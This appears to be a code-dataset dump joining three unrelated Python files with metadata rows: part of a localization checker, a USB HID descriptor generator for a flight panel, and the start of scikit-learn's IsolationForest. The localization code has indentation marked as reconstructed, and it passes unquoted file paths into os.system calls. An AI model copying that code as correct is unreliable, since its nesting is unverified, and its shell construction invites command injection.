        self.byLocale['ma'] = self.generateMartian()
    for component in self.pathsByComponent.keys():
        pathPats = self.pathsByComponent[component]
        for paths in pathPats:
            pathPat = paths[1]
            for loc in locales:
                if loc != 'en':
                    relpath = pathPat % loc
                    if self.fileNeedsSync(relpath):
                        needsSync.append(relpath)
    return strsWithWarnings, needsSync
def checkComplete(self, component=''):
    """Report which locales are fully translated. Returns
    (exitCode, strings-with-warnings, relpaths-needing-sync); exitCode is 1 when
    any targeted non-English locale is missing strings.

    NOTE(review): indentation reconstructed (source dump lost it); verify nesting
    against original.
    """
    supportedLocales = []
    exitCode = 0
    # Union of standard locales, targeted locales, observed locales, and 'ma'.
    locales = pslocale.getStandardLocales()
    for loc in self.getTargetedLocales(component):
        if not (loc in locales):
            locales.append(loc)
    for loc in self.byLocale.keys():
        if not (loc in locales):
            locales.append(loc)
    if not ('ma' in locales):
        locales.append('ma')
        self.byLocale['ma'] = self.generateMartian()
    missing = {}
    for loc in locales:
        if loc != 'en':
            if (not loc in self.byLocale.keys()):
                # No data at all for a targeted locale: every English id is missing.
                if loc in self.getTargetedLocales(component):
                    missing[loc] = self.byLocale['en'].keys()
                continue
            for id in self.byLocale['en'].keys():
                if not id in self.byLocale[loc].keys():
                    if missing.get(loc, 0) == 0:
                        missing[loc] = [id]
                    else:
                        missing[loc].append(id)
            if missing.get(loc, 0) == 0:
                supportedLocales.append(loc)
    print('Supported locales: %s' % supportedLocales)
    #print('Targeted locales: %s' % self.conf.targetedLocales)
    complete = True
    for x in self.getTargetedLocales(component):
        if x != 'en':
            if not (x in supportedLocales):
                complete = False
    if not complete:
        exitCode = 1
        '''print ('Missing Translations')
        for key in self.conf.targetedLocales:
            print ('%s is missing: %s' % (key, missing[key]))'''
        # Python 2 print statement with trailing comma (no newline).
        print ('Missing translations for '),
        miss = []
        for key in missing.keys():
            if key in self.getTargetedLocales(component):
                miss.append(key)
        print (miss)
    strWithWarnings, needsSync = self.check(component)
    return exitCode, strWithWarnings, needsSync
def _connect(self):
    """Rebuild self.byLocale from parsed data: merge duplicate English strings
    by id (accumulating file locations), then index each translation file by its
    locale and cross-link every translated StrDef with its English source.

    NOTE(review): indentation reconstructed (source dump lost it); verify the
    placement of 'self.byLocale[locale] = thisLoc' and 'i += 1' against original.
    """
    self.byLocale = {}
    en = {}
    for file in self.src.keys():
        for strdef in self.src[file]:
            if strdef.id in en:
                # Merge the two identical strings
                en[strdef.id].addLoc(strdef.fileLocs[0])
            else:
                en[strdef.id] = strdef
    #print('english has %d strings' % len(en.keys()))
    self.byLocale['en'] = en
    for file in self.trans.keys():
        i = 1
        for strdef in self.trans[file]:
            # First string in the file determines (and registers) the locale table.
            if i == 1:
                locale = strdef.locale
                if locale in self.byLocale:
                    thisLoc = self.byLocale[locale]
                else:
                    thisLoc = {}
                    self.byLocale[locale] = thisLoc
                i += 1
            thisLoc[strdef.id] = strdef
            # See if this string exists in English.
            if strdef.id in en:
                src = en[strdef.id]
                src.trans.append(strdef)
                strdef.src = src
def gatherLocales(self, baseFolder, folder, loc):
    """Recursively collect relative paths (under *baseFolder*) of exported
    '*-strings-<loc>.js.xml' files below *folder*."""
    collected = []
    suffix = '-strings-%s.js.xml' % loc
    for entry in os.listdir(baseFolder + folder):
        if os.path.isdir(baseFolder + os.path.join(folder, entry)):
            collected.extend(self.gatherLocales(baseFolder, os.path.join(folder, entry), loc))
        elif os.path.isfile(baseFolder + folder + '/' + entry):
            if entry.find(suffix) != -1:
                collected.append(folder + '/' + entry)
    return collected
def zip(self, folder):
    '''Zip translations by locale'''
    # NOTE(review): indentation reconstructed (source dump lost it). Also note:
    # the ZipFile is never close()d, and paths are joined with '+' rather than
    # os.path.join - verify both against the original before changing behavior.
    if os.path.exists(folder):
        assert(os.path.isdir(folder))
    files = os.listdir(folder)
    for component in self.pathsByComponent:
        locales = self.getTargetedLocales(component)
        for f in files:
            # Only zip real batch directories, never existing .zip files.
            if os.path.isdir(folder+'/'+f) and f.find('.zip') == -1:
                for loc in locales:
                    zipFiles = self.gatherLocales(folder, f, loc)
                    if zipFiles != []:
                        zipName = f+'-'+loc+'.zip'
                        # Python 2 print statement.
                        print 'Creating zip folder %s' % os.path.join(folder, zipName)
                        if os.path.exists(zipName):
                            ioutil.nuke(zipName)
                        z = zipfile.ZipFile(folder+zipName, "w", zipfile.ZIP_DEFLATED)
                        for zf in zipFiles:
                            z.write(folder+zf,zf)
def importZip(self, folder, fileLoc):
    """Extract one translation zip (or every '*.zip' under a directory prefix)
    into *folder* and load each contained .xml batch file.

    NOTE(review): indentation reconstructed (source dump lost it); verify nesting
    against original.
    """
    if os.path.exists(folder):
        assert(os.path.isdir(folder))
    else:
        os.mkdir(folder)
    # Directory that should contain the zip(s).
    fileFolder = fileLoc[0:fileLoc.find('.zip')]
    fileFolder = fileFolder[0:fileFolder.rfind('/')]
    if os.path.exists(fileFolder):
        if fileLoc.find('.zip') > -1:
            files = [fileLoc.strip('/')]
        else:
            files = glob.glob(fileLoc+'*.zip')
        for f in files:
            z = zipfile.ZipFile(f, 'r')
            print ('Extracting folder %s' % f)
            z.extractall(folder)
            for x in z.namelist():
                if x.find('.xml') > -1:
                    self.loadFile(folder, x)
def loadFile(self, baseFolder, fileName):
    """Load one translated batch .xml file: parse its <string> entries, build
    StrDef objects for the target locale (skipping empty/'?' values), store them
    in self.trans/self.byLocale, and regenerate the corresponding JS file.

    NOTE(review): indentation reconstructed (source dump lost it); verify nesting
    against original - in particular which statements sit inside the 'for v in
    vals' loop versus the 'for s in strings' loop.
    """
    fileXML = codecs.open(baseFolder+fileName, 'r')
    fileXML = fileXML.read().decode('UTF-8')
    fileXML = accentChars(fileXML)
    dom = xml.dom.minidom.parseString(fileXML.encode('UTF-8', 'xmlcharrefreplace'))
    strings = dom.getElementsByTagName('string')
    info = dom.getElementsByTagName('relativePath')
    # <relativePath> holds the original strings-file path; its locale suffix
    # sits between the last '-' and '.js'.
    for i in info:
        locale = _get_xml_text(i.childNodes)
    loc = locale[locale.rfind('-')+1:locale.rfind('.js')]
    tran = []
    byLoc = {}
    for s in strings:
        vals = s.getElementsByTagName('val')
        for v in vals:
            if v.attributes['lang'].value == 'en':
                id = _get_xml_text(v.childNodes)
            if v.attributes['lang'].value == loc:
                txt = _get_xml_text(v.childNodes)
        # Skip untranslated entries.
        if not txt or txt == u'?':
            continue
        notes = s.getElementsByTagName('note')
        for note in notes:
            id += '@@' + _get_xml_text(note.childNodes)
        strdef = StrDef(undoPrepForXml(id), undoPrepForXml(txt), loc)
        warnings = strdef.getWarnings()
        for w in warnings:
            print(w)
        tran.append(strdef)
        byLoc[id] = strdef
    if byLoc and tran:
        self.trans[locale] = tran
        self.byLocale[loc] = byLoc
        self.update(locale)
def find(self, path):
    """Interactively review possible missed strings: print format-specifier
    errors, then for each candidate either auto-wrap it in _() (when preceded by
    a known UI property like text:/title:), or prompt the user to wrap, skip,
    whitelist (into .do-not-extract.txt), or open the file in an editor. A log
    of changes is always written to <sandbox>/translations/LocChanges.log.

    NOTE(review): indentation reconstructed (source dump lost it); verify nesting
    against original - this method is deeply nested and order-sensitive.
    """
    for key in self.formatErrors:
        print ('%s%s\n' % (path, key))
        for line in self.formatErrors[key]:
            printc(WARNING_COLOR + 'Please change to the correct format specifiers on line %d.' % line.fileLocs[0].line + ERROR_COLOR)
            printc("%s\n" % line.id + NORMTXT)
    printc(CMD_COLOR + ''.rjust(80, '*') + NORMTXT)
    # Whitelist file is opened in append mode; ids the user rejects are added.
    doNotExtract = open(path+'.do-not-extract.txt', 'a')
    num = 0
    ff = FakeFile()
    for key in self.possibleMisses:
        num += len(self.possibleMisses[key])
    try:
        try:
            print ("%d possible missed strings." % num)
            fileNum = 1
            for key in self.possibleMisses:
                printc(CMD_COLOR + '\nFile %d of %d Files' % (fileNum, len(self.possibleMisses)) + NORMTXT)
                fileNum += 1
                ff.printf('%s%s\n' % (path,key))
                printc(CMD_COLOR + '%s possible misses in this file.\n' % len(self.possibleMisses[key]) + NORMTXT)
                f = open(path+'/'+key, 'r+')
                lines = f.readlines()
                for miss in self.possibleMisses[key]:
                    # start/end bracket the quoted literal (including quotes) on its line.
                    start = lines[miss.fileLocs[0].line-1].find(miss.id)-1
                    end = start + len(miss.id)+2
                    # Properties whose values are safe to auto-wrap in _().
                    autoCorrect = ['text:\s?', 'header:\s?', 'title:\s?', 'msg:\s?', 'label:\s?']
                    auto = False
                    for ac in autoCorrect:
                        correct = re.compile(r'%s' % ac, re.IGNORECASE)
                        if correct.search(lines[miss.fileLocs[0].line-1][start-len(ac):start]):
                            ff.printf('Auto change (from-to) line %s\n %s' % (miss.fileLocs[0].line, lines[miss.fileLocs[0].line-1].strip()))
                            line = lines[miss.fileLocs[0].line-1]
                            lines[miss.fileLocs[0].line-1] = line[0:start] + '_(' + line[start:end] + ')' + line[end:len(line)]
                            ff.printf('%s\n' % lines[miss.fileLocs[0].line-1].strip())
                            f.seek(0)
                            f.writelines(lines)
                            auto = True
                            break
                    if auto:
                        continue
                    # Interactive prompt loop: show context, read y/n/s/e answer.
                    answer = ''
                    while not answer:
                        printc(DELIM_COLOR + '%s %s' % (miss.fileLocs[0].line-1, lines[miss.fileLocs[0].line-2].strip()) + NORMTXT)
                        printc(DELIM_COLOR + str(miss.fileLocs[0].line) + ' ' + TITLE_COLOR + lines[miss.fileLocs[0].line-1][0:start].lstrip() + WARNING_COLOR + lines[miss.fileLocs[0].line-1][start:end] + TITLE_COLOR + lines[miss.fileLocs[0].line-1][end:len(lines[miss.fileLocs[0].line-1])] + NORMTXT)
                        if miss.fileLocs[0].line < len(lines):
                            printc(DELIM_COLOR +'%s %s' % (miss.fileLocs[0].line+1, lines[miss.fileLocs[0].line].strip()) + NORMTXT)
                        print ('')
                        answer = raw_input('Is this string suppose to be translated {(y)es/(n)o/(s)kip/(e)dit}?[s]\n%s\t: ' % miss.id)
                        print ('')
                        if answer == '':
                            answer = 's'
                        if 'ty1'.find(answer.lower()[0]) != -1:
                            # yes: wrap the literal in _() and rewrite the file.
                            ff.write('Auto change (from-to) line %s\n %s' % (miss.fileLocs[0].line, lines[miss.fileLocs[0].line-1].strip()))
                            line = lines[miss.fileLocs[0].line-1]
                            lines[miss.fileLocs[0].line-1] = line[0:start] + '_(' + line[start:end] + ')' + line[end:len(line)]
                            ff.write('%s\n' % lines[miss.fileLocs[0].line-1].strip())
                            f.seek(0)
                            f.writelines(lines)
                        elif 'fn0'.find(answer.lower()[0]) != -1:
                            # no: whitelist the id so it is never flagged again.
                            doNotExtract.write(miss.id+'\n')
                        elif 's'.find(answer.lower()[0]) != -1:
                            pass
                        elif 'e'.find(answer.lower()[0]) != -1:
                            # edit: open the file in an external editor.
                            if os.name == 'nt':
                                os.system('start notepad %s' % ('%s/%s' % (path,key)))
                            else:
                                os.system('vi -R %s' % ('%s/%s' % (path,key)))
                        else:
                            print ('Not a vaild response')
                            answer = ''
                f.close()
        except KeyboardInterrupt:
            f.close()
    finally:
        # Always persist the change log, creating the translations dir if needed.
        sb = sandbox.create_from_within(path)
        if not os.path.exists(os.path.join(sb.get_root(), 'translations')):
            os.mkdir(os.path.join(sb.get_root(), 'translations'))
        cl = open(os.path.join(sb.get_root(),'translations','LocChanges.log'), 'w')
        cl.write(ff.txt)
        doNotExtract.close()
| perfectsearch/sandman | code/buildscripts/l10n/locdata.py | Python | mit | 37,139 | [
"VisIt"
] | 1b8463bb29bbb0d086081f91191ff1961cf38fbbfe3c3ad7b4763bc2c0ee009f |
#!/usr/bin/python3
#
# flightpanel - A Cortex-M4 based USB flight panel for flight simulators.
# Copyright (C) 2017-2017 Johannes Bauer
#
# This file is part of flightpanel.
#
# flightpanel is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; this program is ONLY licensed under
# version 3 of the License, later versions are explicitly excluded.
#
# flightpanel is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with flightpanel; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Johannes Bauer <JohannesBauer@gmx.de>
from GeneralEnums import *
from SpecificEnums import *
from DescriptorParser import DescriptorParser
class USBHidReportDescriptor(object):
	"""Incremental builder for a USB HID report descriptor byte stream.

	Items are encoded as short-form HID items: a one-byte prefix followed by
	zero, one or two little-endian data bytes.  add_collection() emits the
	collection header together with its closing END_COLLECTION byte (0xc0)
	and returns a clone positioned *before* that closing byte, so items added
	through the clone are inserted inside the collection.
	"""

	def __init__(self):
		self._data = [ ]					# descriptor bytes emitted so far
		self._offset = 0					# 0 = append at end; negative = insert that many bytes before the end
		self._last_report_count = None		# most recent REPORT_COUNT value
		self._last_report_size = None		# most recent REPORT_SIZE value, in bits
		self._report_length = 0				# accumulated input/output report payload length in bits
		self._comments = { }				# byte offset -> comment text for the final dump

	@property
	def comments(self):
		"""Dict mapping byte offsets to human-readable comments."""
		return self._comments

	def _append(self, data, comment = None):
		"""Append raw bytes (or insert them before the tail when offset < 0)."""
		if comment is not None:
			# Record the comment at the position the data is actually placed at;
			# with a negative offset this is before the trailing byte(s).
			self._comments[len(self._data) + self._offset] = comment
		if self._offset == 0:
			self._data += data
		else:
			# Inserting every byte at the same negative index keeps the bytes
			# in original order: each new byte lands after the previous one.
			for value in data:
				self._data.insert(self._offset, value)

	def _at_offset(self, index):
		"""Return a clone sharing our data and comments, inserting at a relative offset."""
		clone = USBHidReportDescriptor()
		clone._data = self._data
		# Share the comment dict so comments added via the clone (e.g. inside a
		# collection) are visible through the parent descriptor's dump.
		clone._comments = self._comments
		clone._offset += index
		return clone

	def _add_item(self, enum, data, comment = None):
		"""Emit one short-form HID item with zero, one or two data bytes."""
		value = int(enum) << 2
		if data is None:
			encoding = [ ]
		elif 0 <= data <= 255:
			value |= 0b01
			encoding = [ data ]
		elif 256 <= data <= 65535:
			value |= 0b10
			encoding = [ (data >> 0) & 0xff, (data >> 8) & 0xff ]
		else:
			# Negative values and four-byte items are not implemented.
			raise ValueError("Unsupported item data value: %s" % str(data))
		self._append([ value ] + encoding, comment = comment)
		return self

	def add_usage_page(self, usage_page):
		"""Emit a USAGE_PAGE item."""
		self._add_item(Item.UsagePage, usage_page)
		return self

	def add_usage(self, usage, comment = None):
		"""Emit a USAGE item."""
		self._add_item(Item.Usage, usage, comment = comment)
		return self

	def add_collection(self, collection_type):
		"""Open a collection; returns a clone that inserts before END_COLLECTION (0xc0)."""
		self._append([ 0xa1, int(collection_type), 0xc0 ])
		return self._at_offset(-1)

	def add_usage_minimum(self, min_value):
		"""Emit a USAGE_MINIMUM item."""
		self._add_item(Item.UsageMinimum, min_value)
		return self

	def add_usage_maximum(self, max_value):
		"""Emit a USAGE_MAXIMUM item."""
		self._add_item(Item.UsageMaximum, max_value)
		return self

	def add_report_count(self, report_count):
		"""Emit a REPORT_COUNT item and remember it for report-length accounting."""
		self._last_report_count = report_count
		self._add_item(Item.ReportCount, report_count)
		return self

	def add_report_size(self, report_size, round_up = True):
		"""Emit a REPORT_SIZE item (bits); optionally round up to whole bytes."""
		if round_up:
			report_size = (report_size + 7) // 8 * 8
		self._last_report_size = report_size
		self._add_item(Item.ReportSize, report_size)
		return self

	def add_report_id(self, report_id):
		"""Emit a REPORT_ID item."""
		self._add_item(Item.ReportID, report_id)
		return self

	def add_input(self, input_flags, comment = None):
		"""Emit an INPUT item; accumulates count * size into report_length."""
		self._report_length += self._last_report_count * self._last_report_size
		self._add_item(Item.Input, input_flags, comment = comment)
		return self

	def add_output(self, output_flags, comment = None):
		"""Emit an OUTPUT item; accumulates count * size into report_length."""
		self._report_length += self._last_report_count * self._last_report_size
		self._add_item(Item.Output, output_flags, comment = comment)
		return self

	def add_logical_minimum(self, min_value):
		"""Emit a LOGICAL_MINIMUM item (non-negative values only, see _add_item)."""
		self._add_item(Item.LogicalMinimum, min_value)
		return self

	def add_logical_maximum(self, max_value):
		"""Emit a LOGICAL_MAXIMUM item."""
		self._add_item(Item.LogicalMaximum, max_value)
		return self

	def add_unit(self, unit):
		"""Emit a UNIT item."""
		self._add_item(Item.Unit, unit)
		return self

	def add_unit_exponent(self, unit_exponent):
		"""Emit a UNIT_EXPONENT item."""
		self._add_item(Item.UnitExponent, unit_exponent)
		return self

	def add_padding_bits(self, count, comment = None):
		"""Emit a constant input item of 'count' bits to pad a report to a byte boundary."""
		self.add_report_count(1)
		self.add_report_size(count, round_up = False)
		self.add_input(InputOutputFeatureFlags.Constant, comment = comment)

	def add_pushbuttons(self, count, start_button = 1, comment = None):
		"""Emit 'count' one-bit button inputs starting at the given button usage."""
		self.add_usage_page(UsagePage.Button)
		self.add_usage_minimum(start_button)
		self.add_usage_maximum(start_button + count - 1)
		self.add_logical_minimum(0)
		self.add_logical_maximum(1)
		self.add_report_count(count)
		self.add_report_size(1, round_up = False)
		self.add_input(InputOutputFeatureFlags.Variable, comment)
		return self

	def add_output_bytes(self, count, comment = None):
		"""Emit 'count' opaque 8-bit output fields."""
		self.add_report_count(count)
		self.add_report_size(8)
		self.add_output(InputOutputFeatureFlags.Variable, comment = comment)

	def fp_add_as_button(self, text, button_count, start_button = 1):
		"""Add a button group and pad the report up to the next byte boundary."""
		padding_bits = 8 - (button_count % 8)
		self.add_pushbuttons(button_count, start_button, comment = text)
		if padding_bits != 8:
			self.add_padding_bits(padding_bits, comment = "Padding (%d bit)" % (padding_bits))

	def fp_add_items(self, items):
		"""Add (name, byte_length) input fields, merging runs of equal size into one item.

		items is an iterable of (description, byte_length) tuples in wire order;
		consecutive fields of the same byte length are emitted as a single
		multi-count input item.
		"""
		def _emit(values):
			# Emit one input item covering a run of equally sized fields.
			if len(values) == 0:
				return
			self.add_usage_page(UsagePage.SimulationControls)
			for (text, size_bytes) in values:
				# NOTE(review): every field uses the FlightCommunication usage;
				# presumably a generic placeholder usage -- confirm intended.
				self.add_usage(SimulationControls.FlightCommunication, comment = text)
			size_bytes = values[0][1]
			self.add_logical_minimum(0)
			self.add_logical_maximum((256 ** size_bytes) - 1)
			self.add_report_count(len(values))
			self.add_report_size(size_bytes * 8)
			self.add_input(InputOutputFeatureFlags.Variable | InputOutputFeatureFlags.Volatile)
		similar = [ ]
		for (text, byte_length) in items:
			if (len(similar) != 0) and (similar[0][1] != byte_length):
				_emit(similar)
				similar = [ ]
			similar.append((text, byte_length))
		_emit(similar)

	@property
	def report_length(self):
		"""Total accumulated input/output report payload length in bits."""
		return self._report_length

	def __bytes__(self):
		return bytes(self._data)
# Build the flightpanel HID report descriptor: one application collection
# containing the device->host state report (ID 1) and two opaque host->device
# output reports (IDs 2 and 3).
hid_report = USBHidReportDescriptor()
hid_report.add_usage_page(UsagePage.GenericDesktop)
# Logical min 0?
hid_report.add_usage(GenericDesktop.Joystick)
# 'collection' is a clone that inserts items before the closing
# END_COLLECTION byte of the application collection.
collection = hid_report.add_collection(Collection.Application)
collection.add_report_id(1)
# Input report payload: (field name, size in bytes) in wire order.
collection.fp_add_items([
	("Sequence number", 1),
	("Radio panel", 1),
	("COM divisions", 1),
	("NAV divisions", 1),
	("TX radio ID", 1),
	("DME nav ID", 1),
	("COM1 frequency active index", 2),
	("COM1 frequency standby index", 2),
	("COM2 frequency active index", 2),
	("COM2 frequency standby index", 2),
	("NAV1 frequency active index", 2),
	("NAV1 frequency standby index", 2),
	("NAV1 obs", 2),
	("NAV2 frequency active index", 2),
	("NAV2 frequency standby index", 2),
	("NAV2 obs", 2),
	("XPDR state", 1),
	("XPDR squawk", 2),
	("ADF frequency", 2),
	("AP state", 2),
	("AP altitude", 2),
	("AP heading", 2),
	("AP IAS", 2),
	("AP climbrate", 2),
	("Flip switches", 1),
	("QNH", 2),
	("Nav by GPS", 1),
])
# Output report ID 2: 44 opaque bytes from host to device.
collection.add_report_id(2)
collection.add_usage_page(UsagePage.GenericDesktop)
collection.add_usage(GenericDesktop.Undefined)
collection.add_output_bytes(44)
# Output report ID 3: 27 opaque bytes from host to device.
collection.add_report_id(3)
collection.add_usage_page(UsagePage.GenericDesktop)
collection.add_usage(GenericDesktop.Undefined)
collection.add_output_bytes(27)
data = bytes(hid_report)
# Emit the descriptor as a C array ready to paste into the firmware sources.
# NOTE(review): report_length accumulates bits of *both* input and output
# items -- confirm the printed "Report length" is meant to cover all reports.
print("// " + data.hex())
print("// Report length %d bits = %d bytes" % (collection.report_length, (collection.report_length + 7) // 8))
print()
print("static uint8_t HIDReportDescriptor[] = {")
DescriptorParser(base_indent = 1).dump(data, comments = hid_report.comments)
print("};")
| johndoe31415/flightpanel | usb-descriptor-tool/usb_descriptor_gen.py | Python | gpl-3.0 | 7,456 | [
"ADF"
] | f85c971ae269f983d92049deb9f6ef2e1851e6c9345759d696542ad01c3c310e |
# Authors: Nicolas Goix <nicolas.goix@telecom-paristech.fr>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# License: BSD 3 clause
import numbers
import numpy as np
from scipy.sparse import issparse
from warnings import warn
from ..tree import ExtraTreeRegressor
from ..utils import (
check_random_state,
check_array,
gen_batches,
get_chunk_n_rows,
)
from ..utils.fixes import _joblib_parallel_args
from ..utils.validation import check_is_fitted, _num_samples
from ..utils.validation import _deprecate_positional_args
from ..base import OutlierMixin
from ._bagging import BaseBagging
__all__ = ["IsolationForest"]
class IsolationForest(OutlierMixin, BaseBagging):
    """
    Isolation Forest Algorithm.
    Return the anomaly score of each sample using the IsolationForest algorithm
    The IsolationForest 'isolates' observations by randomly selecting a feature
    and then randomly selecting a split value between the maximum and minimum
    values of the selected feature.
    Since recursive partitioning can be represented by a tree structure, the
    number of splittings required to isolate a sample is equivalent to the path
    length from the root node to the terminating node.
    This path length, averaged over a forest of such random trees, is a
    measure of normality and our decision function.
    Random partitioning produces noticeably shorter paths for anomalies.
    Hence, when a forest of random trees collectively produce shorter path
    lengths for particular samples, they are highly likely to be anomalies.
    Read more in the :ref:`User Guide <isolation_forest>`.
    .. versionadded:: 0.18
    Parameters
    ----------
    n_estimators : int, default=100
        The number of base estimators in the ensemble.
    max_samples : "auto", int or float, default="auto"
        The number of samples to draw from X to train each base estimator.
            - If int, then draw `max_samples` samples.
            - If float, then draw `max_samples * X.shape[0]` samples.
            - If "auto", then `max_samples=min(256, n_samples)`.
        If max_samples is larger than the number of samples provided,
        all samples will be used for all trees (no sampling).
    contamination : 'auto' or float, default='auto'
        The amount of contamination of the data set, i.e. the proportion
        of outliers in the data set. Used when fitting to define the threshold
        on the scores of the samples.
            - If 'auto', the threshold is determined as in the
              original paper.
            - If float, the contamination should be in the range (0, 0.5].
        .. versionchanged:: 0.22
           The default value of ``contamination`` changed from 0.1
           to ``'auto'``.
    max_features : int or float, default=1.0
        The number of features to draw from X to train each base estimator.
            - If int, then draw `max_features` features.
            - If float, then draw `max_features * X.shape[1]` features.
    bootstrap : bool, default=False
        If True, individual trees are fit on random subsets of the training
        data sampled with replacement. If False, sampling without replacement
        is performed.
    n_jobs : int, default=None
        The number of jobs to run in parallel for both :meth:`fit` and
        :meth:`predict`. ``None`` means 1 unless in a
        :obj:`joblib.parallel_backend` context. ``-1`` means using all
        processors. See :term:`Glossary <n_jobs>` for more details.
    random_state : int, RandomState instance or None, default=None
        Controls the pseudo-randomness of the selection of the feature
        and split values for each branching step and each tree in the forest.
        Pass an int for reproducible results across multiple function calls.
        See :term:`Glossary <random_state>`.
    verbose : int, default=0
        Controls the verbosity of the tree building process.
    warm_start : bool, default=False
        When set to ``True``, reuse the solution of the previous call to fit
        and add more estimators to the ensemble, otherwise, just fit a whole
        new forest. See :term:`the Glossary <warm_start>`.
        .. versionadded:: 0.21
    Attributes
    ----------
    base_estimator_ : ExtraTreeRegressor instance
        The child estimator template used to create the collection of
        fitted sub-estimators.
    estimators_ : list of ExtraTreeRegressor instances
        The collection of fitted sub-estimators.
    estimators_features_ : list of ndarray
        The subset of drawn features for each base estimator.
    estimators_samples_ : list of ndarray
        The subset of drawn samples (i.e., the in-bag samples) for each base
        estimator.
    max_samples_ : int
        The actual number of samples.
    offset_ : float
        Offset used to define the decision function from the raw scores. We
        have the relation: ``decision_function = score_samples - offset_``.
        ``offset_`` is defined as follows. When the contamination parameter is
        set to "auto", the offset is equal to -0.5 as the scores of inliers are
        close to 0 and the scores of outliers are close to -1. When a
        contamination parameter different than "auto" is provided, the offset
        is defined in such a way we obtain the expected number of outliers
        (samples with decision function < 0) in training.
        .. versionadded:: 0.20
    n_features_ : int
        The number of features when ``fit`` is performed.
        .. deprecated:: 1.0
            Attribute `n_features_` was deprecated in version 1.0 and will be
            removed in 1.2. Use `n_features_in_` instead.
    Notes
    -----
    The implementation is based on an ensemble of ExtraTreeRegressor. The
    maximum depth of each tree is set to ``ceil(log_2(n))`` where
    :math:`n` is the number of samples used to build the tree
    (see (Liu et al., 2008) for more details).
    References
    ----------
    .. [1] Liu, Fei Tony, Ting, Kai Ming and Zhou, Zhi-Hua. "Isolation forest."
           Data Mining, 2008. ICDM'08. Eighth IEEE International Conference on.
    .. [2] Liu, Fei Tony, Ting, Kai Ming and Zhou, Zhi-Hua. "Isolation-based
           anomaly detection." ACM Transactions on Knowledge Discovery from
           Data (TKDD) 6.1 (2012): 3.
    See Also
    ----------
    sklearn.covariance.EllipticEnvelope : An object for detecting outliers in a
        Gaussian distributed dataset.
    sklearn.svm.OneClassSVM : Unsupervised Outlier Detection.
        Estimate the support of a high-dimensional distribution.
        The implementation is based on libsvm.
    sklearn.neighbors.LocalOutlierFactor : Unsupervised Outlier Detection
        using Local Outlier Factor (LOF).
    Examples
    --------
    >>> from sklearn.ensemble import IsolationForest
    >>> X = [[-1.1], [0.3], [0.5], [100]]
    >>> clf = IsolationForest(random_state=0).fit(X)
    >>> clf.predict([[0.1], [0], [90]])
    array([ 1,  1, -1])
    """
    @_deprecate_positional_args
    def __init__(self, *,
                 n_estimators=100,
                 max_samples="auto",
                 contamination="auto",
                 max_features=1.,
                 bootstrap=False,
                 n_jobs=None,
                 random_state=None,
                 verbose=0,
                 warm_start=False):
        super().__init__(
            base_estimator=ExtraTreeRegressor(
                max_features=1,
                splitter='random',
                random_state=random_state),
            # here above max_features has no links with self.max_features
            bootstrap=bootstrap,
            bootstrap_features=False,
            n_estimators=n_estimators,
            max_samples=max_samples,
            max_features=max_features,
            warm_start=warm_start,
            n_jobs=n_jobs,
            random_state=random_state,
            verbose=verbose)
        self.contamination = contamination
    def _set_oob_score(self, X, y):
        # Out-of-bag scoring has no meaning for an unsupervised forest.
        raise NotImplementedError("OOB score not supported by iforest")
    def _parallel_args(self):
        # ExtraTreeRegressor releases the GIL, so it's more efficient to use
        # a thread-based backend rather than a process-based backend so as
        # to avoid suffering from communication overhead and extra memory
        # copies.
        return _joblib_parallel_args(prefer='threads')
    def fit(self, X, y=None, sample_weight=None):
        """
        Fit estimator.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Use ``dtype=np.float32`` for maximum
            efficiency. Sparse matrices are also supported, use sparse
            ``csc_matrix`` for maximum efficiency.
        y : Ignored
            Not used, present for API consistency by convention.
        sample_weight : array-like of shape (n_samples,), default=None
            Sample weights. If None, then samples are equally weighted.
        Returns
        -------
        self : object
            Fitted estimator.
        """
        X = self._validate_data(X, accept_sparse=['csc'])
        if issparse(X):
            # Pre-sort indices to avoid that each individual tree of the
            # ensemble sorts the indices.
            X.sort_indices()
        rnd = check_random_state(self.random_state)
        # Random uniform pseudo-targets: the forest is unsupervised, the
        # regression trees just need *some* target to fit against.
        y = rnd.uniform(size=X.shape[0])
        # ensure that max_sample is in [1, n_samples]:
        n_samples = X.shape[0]
        if self.contamination != 'auto':
            if not(0. < self.contamination <= .5):
                raise ValueError("contamination must be in (0, 0.5], "
                                 "got: %f" % self.contamination)
        if isinstance(self.max_samples, str):
            if self.max_samples == 'auto':
                max_samples = min(256, n_samples)
            else:
                raise ValueError('max_samples (%s) is not supported.'
                                 'Valid choices are: "auto", int or'
                                 'float' % self.max_samples)
        elif isinstance(self.max_samples, numbers.Integral):
            if self.max_samples > n_samples:
                warn("max_samples (%s) is greater than the "
                     "total number of samples (%s). max_samples "
                     "will be set to n_samples for estimation."
                     % (self.max_samples, n_samples))
                max_samples = n_samples
            else:
                max_samples = self.max_samples
        else:  # float
            if not 0. < self.max_samples <= 1.:
                raise ValueError("max_samples must be in (0, 1], got %r"
                                 % self.max_samples)
            max_samples = int(self.max_samples * X.shape[0])
        self.max_samples_ = max_samples
        # Trees need only be deep enough to isolate max_samples points.
        max_depth = int(np.ceil(np.log2(max(max_samples, 2))))
        super()._fit(X, y, max_samples,
                     max_depth=max_depth,
                     sample_weight=sample_weight)
        if self.contamination == "auto":
            # 0.5 plays a special role as described in the original paper.
            # we take the opposite as we consider the opposite of their score.
            self.offset_ = -0.5
            return self
        # else, define offset_ wrt contamination parameter
        self.offset_ = np.percentile(self.score_samples(X),
                                     100. * self.contamination)
        return self
    def predict(self, X):
        """
        Predict if a particular sample is an outlier or not.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        Returns
        -------
        is_inlier : ndarray of shape (n_samples,)
            For each observation, tells whether or not (+1 or -1) it should
            be considered as an inlier according to the fitted model.
        """
        check_is_fitted(self)
        X = self._validate_data(X, accept_sparse='csr', reset=False)
        is_inlier = np.ones(X.shape[0], dtype=int)
        # Negative decision-function values are outliers.
        is_inlier[self.decision_function(X) < 0] = -1
        return is_inlier
    def decision_function(self, X):
        """
